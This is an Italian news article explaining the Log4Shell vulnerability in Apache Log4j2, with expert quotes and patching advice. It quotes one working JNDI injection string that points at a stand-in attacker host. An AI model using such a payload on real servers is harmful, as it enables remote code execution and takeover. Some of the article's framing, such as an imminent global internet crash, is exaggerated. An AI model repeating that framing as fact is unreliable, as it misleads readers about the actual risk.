Internet a rischio crash globale a causa di Log4Shell, cos'è

Non bastava il Coronavirus a complicare la vita degli esseri umani, adesso ci si aggiunge anche un'apocalisse informatica che rischia di far andare in crash il web. L’Agenzia per la cybersicurezza nazionale sta parlando di "una vasta e diversificata superficie di attacco che coinvolge la totalità della rete e la situazione è “particolarmente grave”. In parole povere il web è in grave pericolo. Scopriamo i dettagli nell'articolo.

Image

L'apocalisse informatica sta per arrivare, il crash di internet è vicino! L’Agenzia per la cybersicurezza nazionale sta parlando di "una vasta e diversificata superficie di attacco che coinvolge la totalità della rete”, definendo la situazione “particolarmente grave”. In parole povere il web è in grave pericolo!

Questo pericolo è stato anche descritto come un "fallimento progettuale di proporzioni catastrofiche" che minaccia tutto il mondo digitale. Si tratta di Log4Shell, scopriamo di cosa si tratta nei dettagli.

Internet in grave pericolo: cos'è Log4Shell?

La cosiddetta vulnerabilità Log4Shell basata su Java Apache Log4j2 è stata descritta come "probabilmente la vulnerabilità più critica che abbiamo visto quest'anno" da Bharat Jogi di Qualys; "un errore di progettazione di proporzioni catastrofiche" ha detto Erka di F-Secure Koivunen e "un flash di memoria nella linea temporale delle vulnerabilità significative" ha concluso Brian Fox di Sonatype.

In realtà quando questa vulnerabilità ha iniziato ad essere scoperta, di recente, tutti gli esperti in cyber sicurezza hanno iniziato a preoccuparsi e, purtroppo, non si tratta di una preoccupazione fuori misura o spropositata, ma è del tutto giustificata.

Scoperta per la prima volta in Minecraft, Log4Shell è una vulnerabilità di esecuzione di codice remoto (RCE) che, se non mitigata, potrebbe consentire a un malintenzionato di eseguire un codice Java arbitrario per assumere il controllo di un server di destinazione.

Internet in pericolo: la vulnerabilità riguarda il linguaggio Java

Java è il linguaggio di programmazione più usato al mondo: miliardi di programmi e applicazioni, dai server agli smartphone sono scritti in Java e sono, purtroppo, in pericolo in questo momento. E pare che questa vulnerabilità sia anche facile da sfruttare.

Log4j  è praticamente ovunque ed è utilizzato anche dai giganti della tecnologia come Apple, Amazon, Cisco, Microsoft, VMware e una lunga lista di altri a rischio crash, insieme a tutti i servizi che utilizzano Apache Struts2 , Apache Solr, Apache Druid o Apache Flink.

In effetti, ha affermato Jason Sattler di F-Secure: "Trovare un'app che non utilizza la libreria Log4J potrebbe essere più difficile che trovarne una che lo faccia".

"Questo è lo scenario peggiore", ha affermato Casey Ellis, chief technology officer di Bugcrowd. "La combinazione dell'uso onnipresente di Log4j in software e piattaforme, renderanno difficile la correzione di questa vulnerabilità senza rompere altre cose".

Internet a rischio: dove si trova questa vulnerabilità?

La vulnerabilità si trova nei tag di questi log, simili un po' ai tag che troviamo sui social, su Twitter, e che consentono di trovare il tipo di log scritto in precedenza. 

Ebbene la vulnerabilità permette ad uno di questi tag di lanciare un comando e poter fare sul web, dunque, qualsiasi cosa. 

Ma quali cose pericolose si potrebbero fare? Si potrebbe lanciare qualsiasi tipo di comando o di programma. Un hacker malintenzionato potrebbe attraverso questo tag far eseguire alla macchina quello che vuole.

Ma per fare cosa? Cosa si potrebbe fare di pericoloso? Per esempio si potrebbe sfruttare questa vulnerabilità per fare mining di criptovalute! Oppure entrare nei server di un'azienda, rubare credenziali, denaro, segreti industriali, sferrare attacchi ransomware, eccetera. 

Come mettere in sicurezza i sistemi da questo rischio di apocalisse di internet?

Ovviamente, i team di sicurezza devono applicare immediatamente l'aggiornamento software già rilasciato da Apache in Log4j2. 

Ma oltre a ciò, Log4Shell presenta un tipo di sfida sostanzialmente diverso per chi si occupa di sicurezza; secondo il ricercatore senior di Sophos sulle minacce Sean Gallagher. "Molte vulnerabilità del software sono limitate a un prodotto o una piattaforma specifici, come le vulnerabilità ProxyLogon e ProxyShell in Microsoft Exchange", ha affermato. “Una volta che i difensori sanno quale software è vulnerabile, possono verificarlo e correggerlo. 

Log4Shell è una libreria utilizzata da molti prodotti. Può quindi essere presente negli angoli più bui dell'infrastruttura di un'organizzazione, ad esempio qualsiasi software sviluppato internamente. Trovare tutti i sistemi vulnerabili a causa di Log4Shell diventa un'impresa titanica, ma indispensabile

Si prevede che la velocità con cui gli hacker stanno sfruttando e utilizzando  questa vulnerabilità non  farà che  intensificarsi  e diversificarsi  nei  prossimi giorni e settimane.

Chi si occupa di sicurezza informatica dovrà effettuare un'analisi approfondita dell'attività sulla rete  per individuare e rimuovere qualsiasi traccia di intrusione e farlo al più presto possibile

Informatici esperti di sicurezza sono a lavoro per rimuovere la vulnerabilità che mette a rischio internet

Molte organizzazioni stanno attualmente lottando per inventariare dove esiste Log4j2 nei sistemi utilizzati e questo deve essere fatto con cura per evitare di danneggiare un sistema nel tentativo di correggere una vulnerabilità.

Insomma quello è che è iniziato come uno scherzo di Minecraft, in cui un messaggio in chat come ${jndi:ldap://attacker.com/pwnyourserver} avrebbe preso il controllo di un server o client Minecraft, ora ha provocato un panico di sicurezza mondiale e gli sviluppatori di tutto il mondo stanno cercando di riparare i sistemi prima che i minatori di criptovaluta , gli hacker ransomware e gli avversari degli stati nazionali si precipitino a sfruttare questa vulnerabilità per i loro scopi.

Il 9 dicembre, Chen Zhaojun di Alibaba Cloud Security Team ha scoperto, twittato e rilasciato il codice di esempio della vulnerabilità ora denominata log4shell, in una libreria Java molto comune chiamata log4j utilizzata da migliaia di progetti.

Qualsiasi progetto che utilizza log4j è potenzialmente vulnerabile. La vulnerabilità è stata scoperta per la prima volta su Minecraft e si pensava coinvolgesse solo la piattaforma di gioco, ma una rapida esplorazione ha rivelato che la vulnerabilità invece interessa ogni software che utilizza questa libreria.  

Non solo la vulnerabilità interessa migliaia di programmi, ma lo sfruttamento di questa vulnerabilità è molto semplice. Gli hacker stanno già iniziando a lanciare attacchi diffusi. Ad aggravare ulteriormente il problema c'è l'enorme diversità di sistemi vulnerabili, quindi i responsabili della difesa dei sistemi avranno un pessimo Natale.

Internet in pericolo: cos'è Log4j?

I sistemi informatici sono bestie schizzinose e gli errori si verificano continuamente. Uno dei modi più comuni per trovare problemi è semplicemente registrare tutto ciò che accade. Quando i programmatori lo fanno, lo chiamano appunto "registrazione".

E i bravi programmatori usano una libreria per farlo piuttosto che usare solo un mucchio di print(), che significa istruzioni print-to-screen sparse nel loro codice. Log4j è una di queste librerie, utilizzata da tutti i programmatori Java.   

Sfortunatamente esiste una vulnerabilità molto facile da sfruttare. Quasi tutti i progetti scritti in Java, tra cui appunto Minecraft, includeranno la libreria log4j o una libreria simile. Quindi, se c'è una vulnerabilità in log4j, enormi aree di internet sono in pericolo. 

Quindi, come funziona questa vulnerabilità? 

Il requisito di base affinché un utente malintenzionato sfrutti la vulnerabilità è che l'hacker generi un messaggio, qualsiasi che il programma di destinazione registrerà.

Potrebbe essere qualsiasi cosa, come il contenuto di un URL, il nome utente che tenta di accedere o qualsiasi altro dato che il programmatore pensa di poter, forse, desiderare di registrare. Quindi il server vulnerabile ha bisogno della capacità di riconnettersi all'attaccante per scaricare l'exploit vero e proprio.

Gli aggressori ne stanno già approfittando, tentando richieste dannose per compromettere i server vulnerabili. È una vulnerabilità facile da sfruttare che è stata, però, anche quasi facilmente riparata, nonostante il fatto che la patch iniziale non funzionasse correttamente. Ma poiché log4j è una libreria utilizzata in molti progetti, tutti questi progetti devono essere aggiornati per incorporare la patch, altrimenti saranno vulnerabili alla violazione.

Hacker malintenzionati nel frattempo potrebbero diffondere link corrotti e aprire tramite questa vulnerabilità delle backdoor sui dispositivi delle persone, telefoni, tablet, e qualsiasi altri dispositivo connesso ad internet. Una volta aperta una backdoor l'hacker può fare quello che vuole.

C'è ancora qualche giorno di tempo, altrimenti potrebbe essere troppo tardi. È una corsa contro il tempo.